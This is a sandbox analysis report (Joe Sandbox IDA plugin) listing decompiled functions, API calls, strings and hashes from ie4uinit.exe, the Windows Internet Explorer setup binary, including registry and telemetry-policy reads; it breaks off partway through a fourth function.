Uniqueness Score: -1.00%

Function 00007FF7319D6DD0 Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 256memorynetworkfileCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00007FF7319D6E04
SysStringLen.OLEAUT32 ref: 00007FF7319D6E19
HttpSendRequestW.WININET ref: 00007FF7319D6E2F
InternetReadFile.WININET ref: 00007FF7319D6EAB
GetLastError.KERNEL32 ref: 00007FF7319D6EB5
SysStringByteLen.OLEAUT32 ref: 00007FF7319D6F3E
SysAllocStringByteLen.OLEAUT32 ref: 00007FF7319D6F49
SysFreeString.OLEAUT32 ref: 00007FF7319D6F68
HttpQueryInfoW.WININET ref: 00007FF7319D6E5E

Part of subcall function 00007FF7319C1670: GetProcessHeap.KERNEL32 ref: 00007FF7319C1679

GetLastError.KERNEL32 ref: 00007FF7319D6F70
SysFreeString.OLEAUT32 ref: 00007FF7319D6F9A
SysAllocString.OLEAUT32 ref: 00007FF7319D706E
SysFreeString.OLEAUT32 ref: 00007FF7319D712C

Strings

Content-Type: text/xml; charset=utf-8, xrefs: 00007FF7319D6DEF
https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP, xrefs: 00007FF7319D6FDD
&clientkey=, xrefs: 00007FF7319D7081
&mac=, xrefs: 00007FF7319D70AE

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: String$AllocFree$ByteErrorHttpLast$FileHeapInfoInternetProcessQueryReadRequestSend
String ID: &clientkey=$&mac=$Content-Type: text/xml; charset=utf-8$https://ieonline.microsoft.com/EUPP/v1/service?action=signvalue&appid=Microsoft_IE_EUPP
API String ID: 1371129726-91891535
Opcode ID: be6571e6f4ac5afc3bbaab4d21deb99b18d299ff0e85d6098945e7c69abadc71
Instruction ID: 7a2cb003fbb78582d748db7a16d1cc6948c7a308b3b813ef0c36b9a69c1c7af5
Opcode Fuzzy Hash: be6571e6f4ac5afc3bbaab4d21deb99b18d299ff0e85d6098945e7c69abadc71
Instruction Fuzzy Hash: 3CA19F22F18A92A6EB14BF25D8043B9A3A4BF44B9CF844535DE4D57788DFBCE405A370

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C4F7C Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 206
filewindowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 39%

			E00007FF77FF7319C4F7C(void* __edx, void* __eflags, long long __rbx, void* __rdx, void* __rdi, long long __rsi, void* __r8, void* __r9, void* __r10, long long __r14) {
				void* __rbp;
				void* _t63;
				void* _t64;
				void* _t68;
				void* _t70;
				int _t72;
				signed int _t74;
				void* _t75;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t92;
				void* _t96;
				signed int _t98;
				void* _t128;
				void* _t145;
				signed long long _t146;
				long long _t148;
				long long _t149;
				long long _t182;
				void* _t184;
				void* _t185;
				void* _t187;
				signed long long _t188;
				intOrPtr _t197;

				_t196 = __r9;
				_t182 = __rsi;
				_t181 = __rdi;
				_t149 = __rbx;
				_t145 = _t187;
				 *((long long*)(_t145 + 8)) = __rbx;
				 *((long long*)(_t145 + 0x10)) = __rsi;
				 *((long long*)(_t145 + 0x18)) = __r14;
				_t4 = _t145 - 0x7d8; // -2014
				_t185 = _t4;
				_t188 = _t187 - 0x8d0;
				_t146 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t185 + 0x7c0) = _t146 ^ _t188;
				_t63 = E00007FF77FF7319C4D8C(__rbx, __rdi, __r9, __r14);
				r14d = 2;
				__imp__CoInitializeEx();
				if (_t63 < 0) goto 0x319c52d6;
				_t6 = _t188 + 0x30; // 0x22
				 *(_t188 + 0x30) =  *(_t188 + 0x30) & 0x00000000;
				_t64 = E00007FF77FF7319C6A5C(_t63, _t149, _t6, _t184);
				_t98 =  *(_t188 + 0x30);
				if (_t98 == 0) goto 0x319c4ff1;
				r8d = 0;
				goto 0x319c4fff;
				E00007FF77FF7319C458C(_t64, _t149, _t196);
				r8d = 0x100000;
				E00007FF77FF7319C4408(0xffffffff, _t149, _t6);
				E00007FF77FF7319C3650(0);
				_t68 = E00007FF77FF7319C3650(0x10);
				r9d = _t98;
				_t10 = _t185 + 0x190; // -1614
				r8d = r14d;
				__imp__SHGetSpecialFolderPathW();
				if (_t68 == 0) goto 0x319c507a;
				_t197 =  *0x319e5598; // 0x7ff7319e8cd0
				_t11 = _t185 + 0x190; // -1614
				_t12 = _t185 - 0x80; // -2142
				E00007FF77FF7319C90F4(_t128, _t12, _t10, _t11, _t197, __r10);
				_t13 = _t185 - 0x80; // -2142
				_t70 = E00007FF77FF7319C8A08(_t149, _t13, __rsi);
				__imp__PathFileExistsW();
				if (_t70 == 0) goto 0x319c507a;
				SetFileAttributesW(??, ??);
				_t72 = DeleteFileW(??);
				r9d = _t98;
				_t17 = _t185 - 0x80; // -2142
				r8d = r14d;
				__imp__SHGetSpecialFolderPathW();
				if (_t72 == 0) goto 0x319c50a6;
				r9d = 1;
				_t18 = _t185 - 0x80; // -2142
				r8d = _t98;
				E00007FF77FF7319C4244(0, _t149, _t18, _t17, __r10);
				_t74 = E00007FF77FF7319C3578();
				if (_t74 != 0) goto 0x319c514e;
				 *(_t188 + 0x30) =  *(_t188 + 0x30) & _t74;
				_t75 = E00007FF77FF7319C6A5C(_t74, _t149, _t188 + 0x30);
				if ( *(_t188 + 0x30) != 0) goto 0x319c514e;
				r9d = 0;
				_t23 = _t185 - 0x80; // -2142
				_t24 = _t197 + 0x1a; // 0x1a
				r8d = _t24;
				__imp__SHGetSpecialFolderPathW();
				if (_t75 == 0) goto 0x319c512a;
				GetModuleHandleW(??);
				r9d = 0x104;
				LoadStringW(??, ??, ??, ??);
				_t26 = _t185 + 0x3a0; // -1086
				_t27 = _t185 - 0x80; // -2142
				E00007FF77FF7319C9348(1, _t146 ^ _t188, _t149, _t27, _t23, _t182, _t26, __r10);
				r9d = 0;
				_t28 = _t185 - 0x80; // -2142
				r8d = 0;
				_t79 = E00007FF77FF7319C4244(1, _t149, _t28, _t23, __r10);
				r8d = 0;
				 *(_t188 + 0x30) = 1;
				 *((intOrPtr*)(_t188 + 0x20)) = 4;
				__imp__#654();
				if (_t98 != 0) goto 0x319c5210;
				r9d = 0;
				 *(_t188 + 0x30) = 0x10;
				r8d = r14d;
				 *(_t188 + 0x34) = 0x19;
				_t80 = E00007FF77FF7319C4720(_t79, r14d, _t149, _t188 + 0x30);
				 *(_t188 + 0x30) = r14d;
				r9d = 1;
				 *(_t188 + 0x34) = 0x17;
				 *((intOrPtr*)(_t188 + 0x38)) = 6;
				_t39 = _t149 - 0x14; // 0x3
				r8d = _t39;
				_t81 = E00007FF77FF7319C4720(_t80, r14d, _t149, _t188 + 0x30);
				r9d = 1;
				 *(_t188 + 0x30) = 0x17;
				r8d = 1;
				_t42 = _t149 - 0x13; // 0x4
				_t82 = E00007FF77FF7319C4720(_t81, _t42, _t149, _t188 + 0x30);
				asm("movups xmm0, [0x24d07]");
				r9d = 0;
				_t43 = _t188 + 0x40; // 0x32
				r8d = 1;
				asm("movdqu [esp+0x40], xmm0");
				_t83 = E00007FF77FF7319C47AC(_t82, _t149, _t43, _t182, _t26);
				asm("movups xmm0, [0x24cfa]");
				r9d = 1;
				r8d = r14d;
				asm("movups xmm1, [0x24d1d]");
				_t44 = _t188 + 0x60; // 0x52
				asm("movdqu [esp+0x60], xmm0");
				asm("movdqu [esp+0x70], xmm1");
				E00007FF77FF7319C481C(E00007FF77FF7319C481C(E00007FF77FF7319C47AC(_t83, _t149, _t44, _t182, _t26), r14d, _t181), 0x17, _t181);
				r8d = 0;
				PostMessageW(??, ??, ??, ??);
				if (E00007FF77FF7319C6638() == 0) goto 0x319c526a;
				_t148 = L"Adobe\\Flash Player\\NativeCache";
				 *((intOrPtr*)(_t188 + 0x40)) = 0x1a;
				 *((long long*)(_t188 + 0x50)) = _t148;
				 *(_t188 + 0x44) = 1;
				r9b = sil;
				 *((long long*)(_t188 + 0x58)) = _t148;
				r8b = sil;
				 *(_t188 + 0x48) = 1;
				E00007FF77FF7319CA568(1, _t149, _t188 + 0x40, _t44, _t181, _t182, L"Software\\Clients\\StartMenuInternet");
				E00007FF77FF7319C329C(_t149, _t182);
				_t92 = E00007FF77FF7319C33A8(_t149, _t181, _t182);
				__imp__#281();
				if (_t92 != 0) goto 0x319c5296;
				if (( *(_t188 + 0x30) & sil) == 0) goto 0x319c5296;
				__imp__#282();
				r8d = 0x26;
				_t56 = _t185 + 0x5b0; // -558
				if (E00007FF77FF7319C6680(_t149, _t56, _t182) == 0) goto 0x319c52b8;
				_t57 = _t185 + 0x5b0; // -558
				E00007FF77FF7319C4CB0(_t149, _t57);
				E00007FF77FF7319C4A10(L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Discardable\\PostSetup\\Component Categories\\{00021493-0000-0000-C000-000000000046}\\Enum");
				_t96 = E00007FF77FF7319C4A10(L"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Discardable\\PostSetup\\Component Categories\\{00021494-0000-0000-C000-000000000046}\\Enum");
				__imp__CoUninitialize();
				return E00007FF77FF7319E38D0(_t96, 1,  *(_t185 + 0x7c0) ^ _t188);
			}

0x7ff7319c4f7c
0x7ff7319c4f7c
0x7ff7319c4f7c
0x7ff7319c4f7c
0x7ff7319c4f7c
0x7ff7319c4f7f
0x7ff7319c4f83
0x7ff7319c4f87
0x7ff7319c4f8c
0x7ff7319c4f8c
0x7ff7319c4f93
0x7ff7319c4f9a
0x7ff7319c4fa4
0x7ff7319c4fab
0x7ff7319c4fb0
0x7ff7319c4fbb
0x7ff7319c4fc3
0x7ff7319c4fd0
0x7ff7319c4fd5
0x7ff7319c4fda
0x7ff7319c4fdf
0x7ff7319c4fe5
0x7ff7319c4fe7
0x7ff7319c4fef
0x7ff7319c4ff1
0x7ff7319c4ff6
0x7ff7319c4fff
0x7ff7319c5006
0x7ff7319c5010
0x7ff7319c5015
0x7ff7319c5018
0x7ff7319c501f
0x7ff7319c5024
0x7ff7319c502c
0x7ff7319c502e
0x7ff7319c5035
0x7ff7319c5041
0x7ff7319c5045
0x7ff7319c504a
0x7ff7319c504e
0x7ff7319c5057
0x7ff7319c505f
0x7ff7319c506a
0x7ff7319c5074
0x7ff7319c507a
0x7ff7319c507d
0x7ff7319c5081
0x7ff7319c5086
0x7ff7319c5093
0x7ff7319c5095
0x7ff7319c5098
0x7ff7319c509c
0x7ff7319c50a1
0x7ff7319c50a6
0x7ff7319c50ad
0x7ff7319c50bf
0x7ff7319c50c3
0x7ff7319c50cd
0x7ff7319c50cf
0x7ff7319c50d2
0x7ff7319c50d8
0x7ff7319c50d8
0x7ff7319c50dc
0x7ff7319c50e4
0x7ff7319c50e8
0x7ff7319c50ee
0x7ff7319c5103
0x7ff7319c5109
0x7ff7319c5110
0x7ff7319c5114
0x7ff7319c5119
0x7ff7319c511c
0x7ff7319c5120
0x7ff7319c5125
0x7ff7319c5136
0x7ff7319c5139
0x7ff7319c5140
0x7ff7319c5148
0x7ff7319c5150
0x7ff7319c5156
0x7ff7319c5159
0x7ff7319c5161
0x7ff7319c5164
0x7ff7319c5174
0x7ff7319c517e
0x7ff7319c5183
0x7ff7319c5186
0x7ff7319c518f
0x7ff7319c519a
0x7ff7319c519a
0x7ff7319c519e
0x7ff7319c51a3
0x7ff7319c51a6
0x7ff7319c51aa
0x7ff7319c51b2
0x7ff7319c51b5
0x7ff7319c51ba
0x7ff7319c51c1
0x7ff7319c51c4
0x7ff7319c51c9
0x7ff7319c51cc
0x7ff7319c51d2
0x7ff7319c51d7
0x7ff7319c51de
0x7ff7319c51e1
0x7ff7319c51e4
0x7ff7319c51eb
0x7ff7319c51f0
0x7ff7319c51f6
0x7ff7319c520b
0x7ff7319c5210
0x7ff7319c5223
0x7ff7319c5230
0x7ff7319c5232
0x7ff7319c5239
0x7ff7319c5241
0x7ff7319c524d
0x7ff7319c5251
0x7ff7319c5254
0x7ff7319c5259
0x7ff7319c525c
0x7ff7319c5260
0x7ff7319c5265
0x7ff7319c526a
0x7ff7319c5278
0x7ff7319c5280
0x7ff7319c5287
0x7ff7319c5290
0x7ff7319c5296
0x7ff7319c529c
0x7ff7319c52aa
0x7ff7319c52ac
0x7ff7319c52b3
0x7ff7319c52bf
0x7ff7319c52cb
0x7ff7319c52d0
0x7ff7319c52fd

APIs

Part of subcall function 00007FF7319C4D8C: CreateFileW.KERNEL32 ref: 00007FF7319C4DF6
Part of subcall function 00007FF7319C4D8C: GetLastError.KERNEL32 ref: 00007FF7319C4E05
Part of subcall function 00007FF7319C4D8C: GetLastError.KERNEL32 ref: 00007FF7319C4E15
Part of subcall function 00007FF7319C4D8C: ReadFile.KERNEL32 ref: 00007FF7319C4E5B
Part of subcall function 00007FF7319C4D8C: CloseHandle.KERNEL32 ref: 00007FF7319C4EA1
Part of subcall function 00007FF7319C4D8C: DeleteFileW.KERNEL32 ref: 00007FF7319C4EC9
Part of subcall function 00007FF7319C4D8C: GetLastError.KERNEL32 ref: 00007FF7319C4ED3
Part of subcall function 00007FF7319C4D8C: GetLastError.KERNEL32 ref: 00007FF7319C4EE3

CoInitializeEx.OLE32 ref: 00007FF7319C4FBB

Part of subcall function 00007FF7319C6A5C: #650.IERTUTIL ref: 00007FF7319C6A86

SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C5024
PathFileExistsW.SHLWAPI ref: 00007FF7319C5057
SetFileAttributesW.KERNEL32 ref: 00007FF7319C506A
DeleteFileW.KERNEL32 ref: 00007FF7319C5074
SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C5086
SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C50DC
GetModuleHandleW.KERNEL32 ref: 00007FF7319C50E8
LoadStringW.USER32 ref: 00007FF7319C5103
#654.IERTUTIL ref: 00007FF7319C5148

Part of subcall function 00007FF7319C4720: SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C4762

Part of subcall function 00007FF7319C47AC: SHGetKnownFolderPath.SHELL32(00007FF7319C25CC), ref: 00007FF7319C47D7
Part of subcall function 00007FF7319C47AC: CoTaskMemFree.OLE32 ref: 00007FF7319C47FA

Part of subcall function 00007FF7319C481C: SHGetSpecialFolderPathW.SHELL32 ref: 00007FF7319C4851
Part of subcall function 00007FF7319C481C: GetModuleHandleW.KERNEL32 ref: 00007FF7319C4898
Part of subcall function 00007FF7319C481C: LoadStringW.USER32 ref: 00007FF7319C48AE
Part of subcall function 00007FF7319C481C: PathRemoveExtensionW.SHLWAPI ref: 00007FF7319C48B9
Part of subcall function 00007FF7319C481C: GetModuleHandleW.KERNEL32 ref: 00007FF7319C48F1
Part of subcall function 00007FF7319C481C: LoadStringW.USER32 ref: 00007FF7319C4907
Part of subcall function 00007FF7319C481C: PathRemoveExtensionW.SHLWAPI ref: 00007FF7319C4912

PostMessageW.USER32 ref: 00007FF7319C5223

Part of subcall function 00007FF7319C6638: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF7319CB2D5), ref: 00007FF7319C6650

#281.IERTUTIL ref: 00007FF7319C5278
#282.IERTUTIL ref: 00007FF7319C5290
CoUninitialize.OLE32 ref: 00007FF7319C52D0

Part of subcall function 00007FF7319CA568: SetFileAttributesW.KERNEL32 ref: 00007FF7319CA66D
Part of subcall function 00007FF7319CA568: wcscat_s.MSVCRT ref: 00007FF7319CA72C
Part of subcall function 00007FF7319CA568: wcscat_s.MSVCRT ref: 00007FF7319CA743
Part of subcall function 00007FF7319CA568: FindFirstFileW.KERNEL32 ref: 00007FF7319CA755

Part of subcall function 00007FF7319C329C: memset.MSVCRT ref: 00007FF7319C32E2
Part of subcall function 00007FF7319C329C: GetVersionExA.KERNEL32 ref: 00007FF7319C32EC

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-00000000004, xrefs: 00007FF7319C52B8
Adobe\Flash Player\NativeCache, xrefs: 00007FF7319C5232
Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-00000000004, xrefs: 00007FF7319C52C4
Software\Clients\StartMenuInternet, xrefs: 00007FF7319C5213

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Path$File$Folder$Special$ErrorHandleLast$LoadModuleString$AttributesDeleteExtensionOnceRemovewcscat_s$#281#282#650#654CloseCreateExecuteExistsFindFirstFreeInitInitializeKnownMessagePostReadTaskUninitializeVersionmemset
String ID: Adobe\Flash Player\NativeCache$Software\Clients\StartMenuInternet$Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-00000000004$Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-00000000004
API String ID: 3202643428-768262421
Opcode ID: 35c2ca766d56c54afd8864ad09956f66751ba0359b948913f5cdf325deef9939
Instruction ID: df5573b93f8ad64102accdc84f746be3cfb7982865f512419d8d760b49193752
Opcode Fuzzy Hash: 35c2ca766d56c54afd8864ad09956f66751ba0359b948913f5cdf325deef9939
Instruction Fuzzy Hash: 5CA19022F186C2A6F710BF25E4416A9A760FB8474CF805035EACE53A9DDFBCE504DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DFDB4 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 208
librarynativeloaderCOMMONCrypto

Download Yara Rule

C-Code - Quality: 18%

			E00007FF77FF7319DFDB4(long long __rbx, signed int* __rcx, signed int* __rdx, long long __rsi, long long _a8, long long _a16, signed int _a24, signed int _a32) {
				void* _v40;
				long long _v48;
				intOrPtr _v56;
				long long _v64;
				intOrPtr _v72;
				long long _v80;
				intOrPtr _v88;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				long long _v128;
				long long _v136;
				signed int _t62;
				int _t63;
				void* _t64;
				void* _t65;
				signed int _t66;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t71;
				signed int _t72;
				signed int _t90;
				long long _t96;
				long long _t125;
				long long _t131;
				signed int* _t153;
				signed int* _t155;

				_t131 = __rbx;
				_a8 = __rbx;
				_a16 = __rsi;
				_v100 = 4;
				_v48 = L"Reserved.PlatformSigned";
				_t153 = __rdx;
				_v56 = 0x30002e;
				_v64 = L"CodeIntegrity.Telemetry";
				_t155 = __rcx;
				_t125 = L"OptInLevel";
				_v72 = 0x30002e;
				_v80 = _t125;
				_a32 = _a32 & 0;
				_v88 = 0x160014;
				r8d = 0x800;
				r12b = 1;
				r15d = 0;
				LoadLibraryExW(??, ??, ??);
				if (_t125 == 0) goto 0x319dfe4e;
				GetProcAddress(??, ??);
				_a24 = _a24 & 0;
				r9d = 4;
				_v136 =  &_v104;
				_v104 = r9d;
				__imp__NtQueryLicenseValue();
				if (_a24 + 0xffffff55 - 1 > 0) goto 0x319dfed6;
				_t96 = _t125;
				if (_t96 == 0) goto 0x319dfed6;
				_v128 =  &_v100;
				_v136 =  &_a32;
				 *0x319e7038();
				if (_t96 < 0) goto 0x319dfed9;
				if (_v96 != 1) goto 0x319dfed1;
				_t62 = _a32;
				if (_t62 - 3 > 0) goto 0x319dfed1;
				 *__rcx = _t62;
				goto 0x319dfed9;
				 *__rcx =  *__rcx & 0x00000000;
				goto 0x319dfed9;
				r12b = 0;
				if (_t125 == 0) goto 0x319dfee7;
				_t63 = FreeLibrary(??);
				if (r12b == 0) goto 0x319dff00;
				if (__rdx == 0) goto 0x319e0099;
				 *((intOrPtr*)(__rdx)) = 3;
				goto 0x319e0099;
				r12d = 1;
				_a32 = 3;
				r15d = r12d;
				r14b = r12b;
				_t64 = E00007FF77FF7319DF988(_t63,  &_a32, 0x80000002, L"Software\\Policies\\Microsoft\\Windows\\DataCollection", L"AllowTelemetry");
				if (_t64 != 0x80070002) goto 0x319dff3f;
				r14b = 0;
				goto 0x319dff43;
				if (_t64 < 0) goto 0x319dff90;
				_a24 = r12b;
				_v104 = 3;
				_t65 = E00007FF77FF7319DFBB8(__rbx,  &_a24,  &_v104, L"AllowTelemetry");
				_t66 = _a24;
				if (_t65 >= 0) goto 0x319dff6f;
				if (_t66 != 0) goto 0x319dff90;
				if (r14b != 0) goto 0x319dff7d;
				if (_t66 != 0) goto 0x319dff7d;
				r15d = 0;
				goto 0x319dff89;
				_t67 = _v104;
				_t68 =  <  ? _a32 : _t67;
				 *_t155 =  <  ? _a32 : _t67;
				if (r15d == 0) goto 0x319dffa1;
				if (_t153 == 0) goto 0x319e0099;
				 *_t153 =  *_t153 & 0x00000000;
				goto 0x319e0099;
				_a32 = 3;
				r15d = r12d;
				r14b = r12b;
				_t69 = E00007FF77FF7319DF988( <  ? _a32 : _t67,  &_a32, 0x80000002, L"Software\\Policies\\Microsoft\\Windows\\DataCollection", L"AllowTelemetry_PolicyManager");
				if (_t69 != 0x80070002) goto 0x319dffda;
				r14b = 0;
				goto 0x319dffde;
				if (_t69 < 0) goto 0x319e002b;
				_a24 = r12b;
				_v104 = 3;
				_t70 = E00007FF77FF7319DFBB8(_t131,  &_a24,  &_v104, L"AllowTelemetry_PolicyManager");
				_t71 = _a24;
				if (_t70 >= 0) goto 0x319e000a;
				if (_t71 != 0) goto 0x319e002b;
				if (r14b != 0) goto 0x319e0018;
				if (_t71 != 0) goto 0x319e0018;
				r15d = 0;
				goto 0x319e0024;
				_t72 = _v104;
				_t73 =  <  ? _a32 : _t72;
				 *_t155 =  <  ? _a32 : _t72;
				if (r15d == 0) goto 0x319e0035;
				if (_t153 == 0) goto 0x319e0099;
				 *_t153 = r12d;
				goto 0x319e0099;
				if (_t153 == 0) goto 0x319e0040;
				 *_t153 = 2;
				if (E00007FF77FF7319DF988( <  ? _a32 : _t72, _t155, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\DataCollection", L"AllowTelemetry") != 0x80070002) goto 0x319e0099;
				_a24 = 3;
				_v136 =  &_a32;
				_t53 = _t131 + 4; // 0x4
				_t90 = _t53;
				_a32 = _t90;
				r9d = _t90;
				__imp__NtQueryLicenseValue();
				 *_t155 = _a24;
				return 0;
			}

0x7ff7319dfdb4
0x7ff7319dfdb4
0x7ff7319dfdb9
0x7ff7319dfdd7
0x7ff7319dfdde
0x7ff7319dfde2
0x7ff7319dfdec
0x7ff7319dfdf3
0x7ff7319dfdf7
0x7ff7319dfdfa
0x7ff7319dfe01
0x7ff7319dfe0a
0x7ff7319dfe0e
0x7ff7319dfe1a
0x7ff7319dfe21
0x7ff7319dfe27
0x7ff7319dfe2a
0x7ff7319dfe2d
0x7ff7319dfe39
0x7ff7319dfe45
0x7ff7319dfe4e
0x7ff7319dfe55
0x7ff7319dfe5b
0x7ff7319dfe64
0x7ff7319dfe71
0x7ff7319dfe83
0x7ff7319dfe85
0x7ff7319dfe88
0x7ff7319dfe8e
0x7ff7319dfe9b
0x7ff7319dfeaf
0x7ff7319dfebd
0x7ff7319dfec3
0x7ff7319dfec5
0x7ff7319dfecb
0x7ff7319dfecd
0x7ff7319dfecf
0x7ff7319dfed1
0x7ff7319dfed4
0x7ff7319dfed6
0x7ff7319dfedc
0x7ff7319dfee1
0x7ff7319dfeea
0x7ff7319dfeef
0x7ff7319dfef5
0x7ff7319dfefb
0x7ff7319dff00
0x7ff7319dff06
0x7ff7319dff22
0x7ff7319dff29
0x7ff7319dff2c
0x7ff7319dff38
0x7ff7319dff3a
0x7ff7319dff3d
0x7ff7319dff41
0x7ff7319dff4a
0x7ff7319dff52
0x7ff7319dff5d
0x7ff7319dff64
0x7ff7319dff69
0x7ff7319dff6d
0x7ff7319dff72
0x7ff7319dff76
0x7ff7319dff78
0x7ff7319dff7b
0x7ff7319dff7d
0x7ff7319dff83
0x7ff7319dff87
0x7ff7319dff8e
0x7ff7319dff93
0x7ff7319dff99
0x7ff7319dff9c
0x7ff7319dffa8
0x7ff7319dffc1
0x7ff7319dffc4
0x7ff7319dffc7
0x7ff7319dffd3
0x7ff7319dffd5
0x7ff7319dffd8
0x7ff7319dffdc
0x7ff7319dffe5
0x7ff7319dffed
0x7ff7319dfff8
0x7ff7319dffff
0x7ff7319e0004
0x7ff7319e0008
0x7ff7319e000d
0x7ff7319e0011
0x7ff7319e0013
0x7ff7319e0016
0x7ff7319e0018
0x7ff7319e001e
0x7ff7319e0022
0x7ff7319e0029
0x7ff7319e002e
0x7ff7319e0030
0x7ff7319e0033
0x7ff7319e0038
0x7ff7319e003a
0x7ff7319e0064
0x7ff7319e0068
0x7ff7319e0079
0x7ff7319e007e
0x7ff7319e007e
0x7ff7319e0081
0x7ff7319e0084
0x7ff7319e008e
0x7ff7319e0097
0x7ff7319e00b6

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF7319DFE2D
GetProcAddress.KERNEL32 ref: 00007FF7319DFE45

Part of subcall function 00007FF7319DF988: RegGetValueW.ADVAPI32 ref: 00007FF7319DF9C1

NtQueryLicenseValue.NTDLL ref: 00007FF7319DFE71
FreeLibrary.KERNEL32 ref: 00007FF7319DFEE1
NtQueryLicenseValue.NTDLL ref: 00007FF7319E008E

Strings

AllowTelemetry, xrefs: 00007FF7319DFF0D, 00007FF7319DFF43, 00007FF7319E0040
AllowTelemetry_PolicyManager, xrefs: 00007FF7319DFFA1, 00007FF7319DFFDE
Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection, xrefs: 00007FF7319E004E
Software\Policies\Microsoft\Windows\DataCollection, xrefs: 00007FF7319DFF1B, 00007FF7319DFFAF
NtQuerySecurityPolicy, xrefs: 00007FF7319DFE3B
OptInLevel, xrefs: 00007FF7319DFDFA
CodeIntegrity.Telemetry, xrefs: 00007FF7319DFDE5
Reserved.PlatformSigned, xrefs: 00007FF7319DFDD0
ntdll.dll, xrefs: 00007FF7319DFE11

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Value$LibraryLicenseQuery$AddressFreeLoadProc
String ID: AllowTelemetry$AllowTelemetry_PolicyManager$CodeIntegrity.Telemetry$NtQuerySecurityPolicy$OptInLevel$Reserved.PlatformSigned$Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection$Software\Policies\Microsoft\Windows\DataCollection$ntdll.dll
API String ID: 2720952003-2205401507
Opcode ID: 887f4a608641cc812afca260d9319305be8702d0abd091e01659f4e196a8df75
Instruction ID: 5798b57fd52ae5ea4ef0983d8b3c579e16cd86a303e8c91102950daca02db757
Opcode Fuzzy Hash: 887f4a608641cc812afca260d9319305be8702d0abd091e01659f4e196a8df75
Instruction Fuzzy Hash: AA919F76E08782AAEB14EF64D8542ACBBA0BB0875CFD08135DA0D4379CDFB9E545D360

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D6BB4 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 130
networkCOMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E00007FF77FF7319D6BB4(void* __rax, long long __rbx, void* __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				void* _t39;
				void* _t40;
				signed short _t45;
				void* _t51;
				void* _t54;
				signed int _t63;
				signed long long _t76;
				long long _t79;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t106;
				void* _t108;
				signed long long _t109;
				void* _t116;
				void* _t117;
				void* _t118;
				int _t121;
				int _t123;
				void* _t126;

				 *((long long*)(_t108 + 8)) = __rbx;
				_t106 = _t108 - 0x2270;
				_t39 = E00007FF77FF7319E4200(0x2370, __rax, _t116, _t117);
				_t109 = _t108 - __rax;
